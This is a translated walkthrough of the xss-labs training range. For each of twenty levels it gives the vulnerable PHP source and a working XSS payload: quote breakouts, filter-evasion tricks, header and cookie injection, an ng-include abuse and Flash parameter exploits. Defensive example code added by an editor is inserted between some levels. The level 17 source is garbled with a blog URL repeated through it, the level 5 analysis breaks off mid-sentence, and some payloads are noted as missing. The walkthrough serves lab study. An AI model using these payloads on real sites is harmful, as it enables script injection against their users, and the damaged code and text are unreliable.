
xss-labs range: clearing every level

2023-09-07 17:53



Preface

The xss-labs range used here comes from the project at https://github.com/do0dl3/xss-labs. How to set the range up is not repeated here; it can be built locally with phpstudy. Firefox is recommended; visit http://ip/xss-labs

Click the image to start your xss journey!


level 1

Source:

```php
<body>
<h1 align=center>欢迎来到level1</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
<center><img src=level1.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
```

Analysis: no filtering at all.

payload: name=<script>alert(/xss/)</script>

level 2

Source:

```php
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
<center><img src=level2.png></center>
```

Analysis: there are two output points. The first is in the echo of the PHP block, the second is in the form's input. The first is escaped with htmlspecialchars(); the second has no restriction at all, so it is enough to make the payload take effect at the second one. There are two methods.

1. Stay inside the input tag: close the preceding double quote and add an event handler to trigger XSS:

Moving the mouse triggers it; payload: " onmouseover="alert(/xss/)
Clicking the input box triggers it; payload: " onfocus="alert(/xss/)

2. Break out of the input tag and trigger XSS with another tag:

<img> tag payload: "><img src=! …>  (the event-handler attribute is missing from the extracted page)
tag payload: ">…:alert(/xss/)">  // the browser may filter this one (tag and attribute are missing from the extracted page)
<a> tag payload: "><a …>xss</a>
<a> tag payload: <a onmouseover=alert(/xss/)>xss</a>  // move the mouse into the box

level 3

Source:

```php
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>
<center><img src=level3.png></center>
```

Analysis: this time both output points are escaped with htmlspecialchars(), so double quotes and angle brackets no longer work. Single quotes, however, are left alone by that function unless it is called with non-default flags, and the value attribute in the source is single-quoted, which looks like a deliberate invitation to use a single quote.

payload: ' onmouseover='alert(/xss/)  // other payloads omitted

level 4

Source:

```php
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
```

Analysis: of the two output points here, one is escaped and the other has its angle brackets replaced with nothing. That does not matter: following the pattern of the previous two levels, even though tags cannot be closed, XSS can still be triggered inside the input tag.

payload: " onmouseover="alert(/xss/)  // triggered by clicking the input box with the mouse; other payloads omitted

level 5

Source:

```php
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
```

Analysis: this looks much the same as the previous levels, except that

payload: "><a …>xss</a>  (the attribute is missing from the extracted page)

level 6

Source:

```php
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
```

Analysis: the code still filters keywords, but the strtolower() call is gone, so a mixed-case bypass is enough:

1. Trigger XSS inside the input tag:

payload: (missing from the extracted page)

2. Break out of the input tag to trigger XSS:

payload: "><sCript>alert(/xss/)</sCript>  // and so on

level 7

Source:

```php
<?php 
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
```

Analysis: the level's author seems to have patched every flaw met so far, but the program deliberately replaces the special strings with empty strings, so a splicing approach works: write the keyword around itself so that one deletion leaves the keyword intact.

1. Trigger inside the input tag:

payload: " oonnmouseover="alert(/xss/)  // and so on

2. Break out of the input tag:

payload: "><scscriptript>alert(/xss/)</scscriptript>  // and so on
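The following is an added example, not code from the post or from the xss-labs project: it reproduces the level 7 replacement chain as a function and puts it beside a context-aware escaper, showing on the post's level 3 and level 7 inputs why a single-pass blacklist leaves attribute-breaking characters in place while htmlspecialchars() with ENT_QUOTES neutralises all of them. The names level7_filter, attr and has_attr_breakout are mine.

```php
<?php
// Added example: the level-7 keyword blacklist (one pass of str_replace per
// keyword, mirroring the lab's logic) next to a context-aware escaper.

// Reproduces level 7: lowercase, then delete each keyword exactly once.
function level7_filter(string $s): string {
    $s = strtolower($s);
    foreach (['script', 'on', 'src', 'data', 'href'] as $kw) {
        $s = str_replace($kw, '', $s);   // single pass, the result is not rescanned
    }
    return $s;
}

// The fix: encode for the attribute context. ENT_QUOTES turns ' into &#039;
// as well as " into &quot;. Before PHP 8.1 the default flags left single
// quotes untouched, which is exactly what the level 3 payload relies on;
// passing the flags explicitly removes that dependency on the PHP version.
function attr(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML401, 'UTF-8');
}

// Defender's check: can the value still close a quoted attribute or open a tag?
function has_attr_breakout(string $s): bool {
    return preg_match('/["\'<>]/', $s) === 1;
}

// Constructed inputs: the post's level 3 and level 7 payloads.
$inputs = [
    "' onmouseover='alert(/xss/)",                  // level 3: single-quoted value
    '" oonnmouseover="alert(/xss/)',                // level 7: "on" deleted once -> onmouseover
    '"><scscriptript>alert(/xss/)</scscriptript>',  // level 7: "script" deleted once -> script
];

foreach ($inputs as $in) {
    $filtered = level7_filter($in);
    $escaped  = attr($in);
    printf("blacklist: %-48s breakout=%s\n", $filtered,
           has_attr_breakout($filtered) ? 'yes' : 'no');
    printf("escaped:   %-48s breakout=%s\n\n", $escaped,
           has_attr_breakout($escaped) ? 'yes' : 'no');
}
```

For every input the blacklist line still contains a quote or an angle bracket, while the escaped line contains none, which is the property a reviewer should look for at each output point.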

level 8

Source:

```php
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<?php
 echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>
```

Analysis: this time the code first converts the input to lowercase, then filters the special strings and the double quote, and finally, in case anything slipped through, passes the output through an escaping function, so the usual bypasses are almost certain to fail. The "友情链接" (friendly link) added in the code is the breakthrough: after a string is submitted in the input box, a concatenated a tag is loaded at the friendly link. Since javascript is filtered, encode it to get past the filter, then click the friendly link.

payload: javascript:alert(/xss/)

level 9

(screenshot)

Source:

    <?php 
    ini_set("display_errors", 0);
    $str = strtolower($_GET["keyword"]);
    $str2=str_replace("script","scr_ipt",$str);
    $str3=str_replace("on","o_n",$str2);
    $str4=str_replace("src","sr_c",$str3);
    $str5=str_replace("data","da_ta",$str4);
    $str6=str_replace("href","hr_ef",$str5);
    $str7=str_replace('"','&quot',$str6);
    echo '<center>
    <form action=level9.php method=GET>
    <input name=keyword  value="'.htmlspecialchars($str).'">
    <input type=submit name=submit value=添加友情链接 />
    </form>
    </center>';
    ?>
    <?php
    if(false===strpos($str7,'http://'))
    {
      echo '<center><BR><a href="友情链接">友情链接</a></center>';
    }
    else
    {
      echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
    }
    ?>

Analysis: this level adds a strpos() check on top of the previous one. strpos() returns the offset of 'http://' in the filtered string, or false when it is absent; the comparison uses `===`, so even an offset of 0 counts as found. Only when 'http://' is present is our value written into the href; otherwise a fixed placeholder link is printed. The intent is presumably to force a "legitimate" URL, i.e. one containing http://. But the check does not care where the substring sits, so append it after a JavaScript line comment (`//`): it is present in the string, yet ignored when the javascript: URL runs. The same entity-encoding trick as in level 8 is still needed for the word `script`.

Payload: `javascript:alert(/xss/)//http://` (again with one character of `script` entity-encoded)
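As an added illustration (Python written for this edit, not code from the lab, whose own code is the PHP above), the level 8/9 filter chain modelled next to what the browser does with the resulting href. The replacement pairs are the ones from the PHP; the names LEVEL8_REPLACEMENTS, level8_filter, level9_link_href, browser_view and survives are mine, and the payload strings are constructed samples.

```python
import html
from typing import List, Optional, Tuple

# Model of the level 8/9 server-side filter: the str_replace() calls, in the same order.
LEVEL8_REPLACEMENTS: List[Tuple[str, str]] = [
    ("script", "scr_ipt"),
    ("on", "o_n"),
    ("src", "sr_c"),
    ("data", "da_ta"),
    ("href", "hr_ef"),
    ('"', "&quot"),  # a double quote can no longer close the href="..." attribute
]


def level8_filter(keyword: str) -> str:
    """strtolower() followed by the chain of str_replace() calls."""
    s = keyword.lower()
    for needle, replacement in LEVEL8_REPLACEMENTS:
        s = s.replace(needle, replacement)
    return s


def level9_link_href(keyword: str) -> Optional[str]:
    """Level 9: the attacker-controlled href is only emitted when the filtered string
    contains 'http://' (strpos() !== false). None models the fixed placeholder link."""
    filtered = level8_filter(keyword)
    if "http://" not in filtered:
        return None
    return filtered


def browser_view(attr_value: str) -> str:
    """What the browser does with an attribute value before using it: character
    references such as &#x74; are decoded. The server-side filter never sees this form."""
    return html.unescape(attr_value)


def is_javascript_url(url: str) -> bool:
    """The scheme check performed on a clicked href: leading whitespace is ignored and the
    comparison is case-insensitive."""
    return url.lstrip().lower().startswith("javascript:")


def survives(keyword: str, level: int = 8) -> bool:
    """True if the payload still yields a javascript: URL after the filter of the given
    level and the browser's decoding of the attribute value."""
    href = level8_filter(keyword) if level == 8 else level9_link_href(keyword)
    return href is not None and is_javascript_url(browser_view(href))


if __name__ == "__main__":
    # Constructed payloads: the plain one is mangled, the entity-encoded one passes.
    for payload in ["javascript:alert(/xss/)",
                    "javascrip&#x74;:alert(/xss/)",
                    "javascrip&#x74;:alert(/xss/)//http://"]:
        print(repr(payload), "->", repr(level8_filter(payload)),
              "| level 8:", survives(payload, 8), "| level 9:", survives(payload, 9))
```

The point the model makes explicit: a blacklist that runs before HTML decoding is checking a different string than the one the browser acts on. The fix the lab is missing is not a longer word list but rejecting anything other than an http(s) URL after canonicalising it.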

level 10

(screenshot)

Source:

    <?php 
    ini_set("display_errors", 0);
    $str = $_GET["keyword"];
    $str11 = $_GET["t_sort"];
    $str22=str_replace(">","",$str11);
    $str33=str_replace("<","",$str22);
    echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
    <form id=search>
    <input name="t_link"  value="'.'" type="hidden">
    <input name="t_history"  value="'.'" type="hidden">
    <input name="t_sort"  value="'.$str33.'" type="hidden">
    </form>
    </center>';
    ?>

Analysis: this level has two output points. The first (keyword) is passed through htmlspecialchars(). The second is the hidden form field t_sort, i.e. $str33, where only the angle brackets are stripped; the double quote is not, so we can close the value="..." attribute and append attributes of our own. Trigger the XSS inside the input tag with onmouseover or onclick. Because the field is hidden, also inject type="text" so it is rendered and can be hovered or clicked: the browser keeps the first occurrence of a repeated attribute, so our type="text" wins over the template's type="hidden" that follows it.

Payload: append to the URL `&t_sort=xss" onmouseover=alert(/xss/) type="text`
Payload: append to the URL `&t_sort=xss" onclick=alert(/xss/) type="text`

level 11

(screenshot)

Source:

    <body>
    <h1 align=center>欢迎来到level11</h1>
    <?php 
    ini_set("display_errors", 0);
    $str = $_GET["keyword"];
    $str00 = $_GET["t_sort"];
    $str11=$_SERVER['HTTP_REFERER'];
    $str22=str_replace(">","",$str11);
    $str33=str_replace("<","",$str22);
    echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
    <form id=search>
    <input name="t_link"  value="'.'" type="hidden">
    <input name="t_history"  value="'.'" type="hidden">
    <input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
    <input name="t_ref"  value="'.$str33.'" type="hidden">
    </form>
    </center>';
    ?>

Analysis: the form is hidden, and both $str (keyword) and $str00 (t_sort) are escaped with htmlspecialchars(). The Referer header, however, only has its angle brackets stripped before it is written into the t_ref field as $str33, so that is where the XSS goes: intercept the request with Burp and set the Referer header.

Payload: `Referer: " onmouseover=alert(/xss/) type="text`

(screenshot)

level 12

Source:

    <?php 
    ini_set("display_errors", 0);
    $str = $_GET["keyword"];
    $str00 = $_GET["t_sort"];
    $str11=$_SERVER['HTTP_USER_AGENT'];
    $str22=str_replace(">","",$str11);
    $str33=str_replace("<","",$str22);
    echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
    <form id=search>
    <input name="t_link"  value="'.'" type="hidden">
    <input name="t_history"  value="'.'" type="hidden">
    <input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
    <input name="t_ua"  value="'.$str33.'" type="hidden">
    </form>
    </center>';
    ?>

Analysis: same principle as the previous level; this time the reflected header is User-Agent, so I change that instead.

Payload: `User-Agent: " onclick=alert(/xss/) type="text`

(screenshot)

level 13

(screenshot)

Source:

    <?php 
    setcookie("user", "call me maybe?", time()+3600);
    ini_set("display_errors", 0);
    $str = $_GET["keyword"];
    $str00 = $_GET["t_sort"];
    $str11=$_COOKIE["user"];
    $str22=str_replace(">","",$str11);
    $str33=str_replace("<","",$str22);
    echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
    <form id=search>
    <input name="t_link"  value="'.'" type="hidden">
    <input name="t_history"  value="'.'" type="hidden">
    <input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
    <input name="t_cook"  value="'.$str33.'" type="hidden">
    </form>
    </center>';
    ?>

Analysis: same as above; the reflected value is now the user cookie, so change that in the request.

Payload: `Cookie: user=" onfocus=alert(/xss/) type="text`

(screenshot)

level 14

Source:

    <h1 align=center>欢迎来到level14</h1>
    <center><iframe name="leftframe" marginwidth=10 marginheight=10 src="http://www.exifviewer.org/" frameborder=no width="80%" scrolling="no" height=80%></iframe></center>
    <center>这关成功后不会自动跳转。成功者<a href=/xsschallenge/level15.php?src=1.gif>点我进level15</a></center>

The address loaded by this level's iframe no longer exists, so the level cannot be tested any more. The kind of environment that triggers this XSS can be reproduced simply, though.
Some websites read and display the EXIF information of uploaded images (Exchangeable image file format, officially abbreviated Exif). It was designed for digital camera photos and records the photo's attributes and shooting data; part of it can be seen by right-clicking the file and opening the Properties page. When such a site reads malicious EXIF data and echoes it unescaped, the payload inside it fires. I first create a file named exifxss.php,
then put a normal image named 404 in the same folder and visit
http://ip/xss-labs/exifxss.php
(screenshot)

The image's EXIF information is printed out. What happens if we change the image's EXIF information to an XSS payload?

(screenshot)

The payload is now inside the image's EXIF information. Visit the page again:
(screenshot)

level 15

(screenshot)

Source:

    <html ng-app>
    <head>
    <meta charset="utf-8">
    <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0/angular.min.js"></script>
    <script>
    window.alert = function()  
    {     
    confirm("完成的不错！");
    window.location.href="level16.php?keyword=test"; 
    }
    </script>
    <title>欢迎来到level15</title>
    </head>
    <h1 align=center>欢迎来到第15关，自己想个办法走出去吧！</h1>
    <p align=center><img src=level15.png></p>
    <?php 
    ini_set("display_errors", 0);
    $str = $_GET["src"];
    echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
    ?>

Analysis: the first line (`<html ng-app>`) and the fact that our src parameter is inserted into a class attribute as `ng-include:...` show that this level uses AngularJS's ng-include directive, which behaves much like PHP's include(): here it includes the file 1.gif.
Since the ng-include directive is used, first a look at how it works.

1. ng-include includes an external HTML file.
2. The included content becomes a child node of the specified element.
3. The value of the ng-include attribute can be an expression that returns a file name.
4. By default the included file must be on the same domain.

Points that deserve particular attention:

1. When ng-include is given a plain address, the address must be quoted.
2. <script> tags inside the included HTML are not executed.
3. <style> tags inside the included HTML are applied.

Since an HTML file can be included here, we can include one of the earlier levels' source files that had an XSS, with a payload in its parameter that does not rely on <script>.

Payload: `'level1.php?name=<img src=1` (the rest of the img tag, carrying the event handler, was not preserved in this copy)

(screenshot)

level 16

(screenshot)

Source:

    <?php 
    ini_set("display_errors", 0);
    $str = strtolower($_GET["keyword"]);
    $str2=str_replace("script","&nbsp;",$str);
    $str3=str_replace(" ","&nbsp;",$str2);
    $str4=str_replace("/","&nbsp;",$str3);
    $str5=str_replace("\t","&nbsp;",$str4);   // the original has a literal tab character here
    echo "<center>".$str5."</center>";
    ?>
    <center><img src=level16.png></center>
    <?php 
    echo "<h3 align=center>payload的长度:".strlen($str5)."</h3>";
    ?>

Analysis: the filtering is incomplete and easy to bypass. The code lowercases the input and then

replaces `script` in the parameter value with `&nbsp;`
replaces the space in the parameter value with `&nbsp;` as well
replaces the `/` character in the parameter value with `&nbsp;`

and echoes the result without escaping. The tag we want is something like `<img src=xss onmouseover=alert('xss')>`, and the only thing that breaks it is the loss of the spaces: a literal `&nbsp;` inside a tag is not decoded by the HTML tokenizer, so it does not separate attributes. Carriage return and line feed are not filtered, and the tokenizer treats them as whitespace just like the space, so use them (URL-encoded as %0D and %0A) to separate the attributes.

Payload: `keyword=<img%0Asrc=xss%0Donmouseover=alert('xss')>`

(screenshot)

level 17

在这里插入图片描述

源码:

?https://blog.csdn.net/m0_52051132/article/details/phpini_sethttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/ 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echo "embedsrc=https://blog.csdn.net/m0_52051132/article/details/xsf01.https://blog.csdn.net/m0_52051132/article/details/swf?https://blog.csdn.net/m0_52051132/article/details/".htmlspecialchars($_GET["https://blog.csdn.net/m0_52051132/article/details/arg01"])."https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/".htmlspecialchars($_GET["https://blog.csdn.net/m0_52051132/article/details/arg width=https://blog.csdn.net/m0_52051132/article/details/100https://blog.csdn.net/m0_52051132/article/details/%https://blog.csdn.net/m0_52051132/article/details/ heigth=https://blog.csdn.net/m0_52051132/article/details/100https://blog.csdn.net/m0_52051132/article/details/%https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/";https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/

Analysis: both output values are entity-escaped by htmlspecialchars(), so the tag cannot be closed. The problem is that the embed tag itself accepts event-handler attributes: because the src attribute is unquoted, a space in arg01 (or arg02) ends the attribute value, and an event handler placed after the space becomes a new attribute that fires on its own.

Payload: arg01=123%20onmouseover=alert('xss')&arg02=b


level 18

Source:

    <?php
    ini_set("display_errors", 0);
    // Identical to level 17 apart from the swf file name; the src attribute is still unquoted
    echo "<embed src=xsf02.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
    ?>

Analysis: the same method as the previous level works:

Payload: arg01=123%20onmouseover=alert('xss')&arg02=b
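As an added example (not code from the original walkthrough or from the xss-labs project), the following Python emulates the level 17/18 rendering to show why htmlspecialchars() on its own does not protect an unquoted attribute, places a quoted ENT_QUOTES-style rendering next to it, and parses both results the way a browser would to detect a stray event-handler attribute. The sample values are the arg01/arg02 values from the payload above; the PHP emulation and the hardened variant are the example's own.

```python
import html
from html.parser import HTMLParser

# Constructed sample input: the arg01/arg02 values from the level 17/18 payload.
ARG01 = "123 onmouseover=alert('xss')"
ARG02 = "b"


def php_htmlspecialchars(s: str) -> str:
    """Emulate PHP htmlspecialchars() with its pre-8.1 default flags:
    escapes & < > and the double quote, but not the single quote."""
    return html.escape(s, quote=False).replace('"', "&quot;")


def render_unquoted(arg01: str, arg02: str) -> str:
    """Level 17/18 style: escaped values inside an UNQUOTED src attribute.
    Escaping keeps spaces, and a space ends an unquoted attribute value."""
    return ("<embed src=xsf01.swf?" + php_htmlspecialchars(arg01) + "="
            + php_htmlspecialchars(arg02) + " width=100% heigth=100%>")


def render_quoted(arg01: str, arg02: str) -> str:
    """Hardened rendering: the value is double-quoted and both quote
    characters are escaped (ENT_QUOTES equivalent), so no input can
    terminate the attribute value."""
    def esc(s: str) -> str:
        return html.escape(s, quote=True)
    return ('<embed src="xsf01.swf?' + esc(arg01) + "=" + esc(arg02)
            + '" width="100%" height="100%">')


class EmbedAttrs(HTMLParser):
    """Collect the attributes a browser-side parser sees on the embed tag."""
    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "embed":
            self.attrs = dict(attrs)


def embed_attributes(markup: str) -> dict:
    parser = EmbedAttrs()
    parser.feed(markup)
    return parser.attrs


def has_event_handler(markup: str) -> bool:
    """Detection check: any on* attribute on the rendered embed tag means
    the input left the src attribute context."""
    return any(name.startswith("on") for name in embed_attributes(markup))
```

Running has_event_handler() over both renderings shows the unquoted version gains an onmouseover attribute while the quoted version keeps the whole input inside src.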


level 19

Source:

    <?php
    ini_set("display_errors", 0);
    // The src attribute is now quoted, so attribute injection no longer works; the swf itself becomes the target
    echo '<embed src="xsf03.swf?'.htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"]).'" width=100% heigth=100%>';
    ?>

Analysis: from this level on the challenges are Flash XSS. First download the Flash file embedded in the page and analyse its source; I used the JPEXS decompiler and began by locating the getURL function:

    sIFR.menuItems.push(new ContextMenuItem("Follow link", function() {
        getURL(sIFR.instance.primaryLink, sIFR.instance.primaryLinkTarget);
    }), new ContextMenuItem("Open link in new window", function() {
        getURL(sIFR.instance.primaryLink, "_blank");
    }));

Then trace into the content of sIFR. Some code is omitted; the key part is:

    if (_loc5_ && _root.version != sIFR.VERSION) {
        _loc4_ = sIFR.VERSION_WARNING.split("%s").join(_root.version);
    }

This shows that the version parameter is carried into _loc4_, i.e. into sIFR's content. However, getURL only opens the link when the content is a link, so locate the following function:

    function contentIsLink() {
        return this.content.indexOf("<a ") == 0 && (this.content.indexOf("<a ") == this.content.lastIndexOf("<a ") && this.content.indexOf("</a>") == this.content.length - 4);
    }
    // In short: to reach getURL the content has to be a single <a> tag.

Payload: arg01=version&arg02=%3Ca%20href=%22javascript:alert(%27xss%27)%22%3E111%3C/a%3E // clicking the injected '111' triggers the XSS.


level 20

Source:

    <?php
    ini_set("display_errors", 0);
    // Same structure as level 19, but a different (not visibly rendered) swf file
    echo '<embed src="xsf04.swf?'.htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"]).'" width=100% heigth=100%>';
    ?>

Analysis: here, too, the two submitted parameter values are inserted into the src attribute of the <embed> tag, and again an swf file is referenced; the only difference is that this swf is not visibly rendered on the page. Decompile xsf04.swf with JPEXS again.

It turns out to be zeroclipboard.swf, a Flash plugin that is quite common on Chinese sites. See the FreeBuf article http://www.freebuf.com/sectool/108568.html for reference.

Payload: arg01=id&arg02=%22))}catch(e){(alert)(/XSS/.source);}//%26width=500%26height=500


That concludes the complete xss-labs walkthrough!!!

Source: https://blog.csdn.net/m0_52051132/article/details/127334975
